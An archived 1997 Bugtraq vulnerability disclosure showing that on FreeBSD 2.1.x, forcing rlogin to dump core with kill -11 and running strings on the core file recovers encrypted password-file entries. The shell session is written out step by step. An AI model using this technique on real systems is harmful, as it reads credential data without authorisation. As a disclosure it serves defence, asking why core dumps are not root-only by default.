[4050] in bugtraq
FreeBSD,rlogin and coredumps.
daemon@ATHENA.MIT.EDU (Roelof W Temmingh)
Sun Feb 16 21:15:34 1997
Date: Mon, 17 Feb 1997 01:34:06 +0200
Reply-To: Roelof W Temmingh <roelof@CUBE.NANOTEQ.CO.ZA>
From: Roelof W Temmingh <roelof@CUBE.NANOTEQ.CO.ZA>
To: BUGTRAQ@NETSPACE.ORG
---------- Forwarded message ----------
If the following is already known, my deepest apologies for the junk mail..
RECONSTRUCT PARTS OF UN-SHADOWED PASSWORDFILE ON (at least) FreeBSD
2.1.0,2.1.5:
Bronc Buster wrote:
>This exploit is very similer to the FTP exploit on BSD that creates a
>ftp.core file you can then strings and get the encrypted password file.
....snip...snip..
I tried this technique on my FreeBSD 2.1.0 box. It didn't work. I started
playing around with dump files:
~> rlogin 127.0.0.1
Password:
Last login: Mon Feb 17 00:35:49 from localhost
Copyright (c) 1980, 1983, 1986, 1988, 1990, 1991, 1993, 1994
The Regents of the University of California. All rights reserved.
FreeBSD 2.1.0-RELEASE (WIPS) #0: Thu Oct 17 03:37:25 SAT 1996
You have new mail.
~> ps -ax | grep rlogin
6528 ?? S 0:00.06 rlogind
6527 p1 S+ 0:00.05 rlogin 127.0.0.1
6529 p1 S+ 0:00.01 rlogin 127.0.0.1
~> kill -11 6529~> ls
Brain_Box NS cronjobs mail security
Mail News foon rlogin.core
~>strings rlogin.core > unshadowed.passwdfile.reconstruct
~>vi unshadowed.passwdfile.reconstruct
and reconstruct..
I also tried this on a FreeBSD 2.1.5 box, and it did the same thing. I
wonder if there is a way to make a core dump only readable by root, and why
this isn't the default?
=========================================================================
Roelof W Temmingh Network & Data Security
Nanoteq
rt@nanoteq.com [w] South-Africa
roelof@cube.nanoteq.co.za [ah] http://www.nanoteq.com
=========================================================================
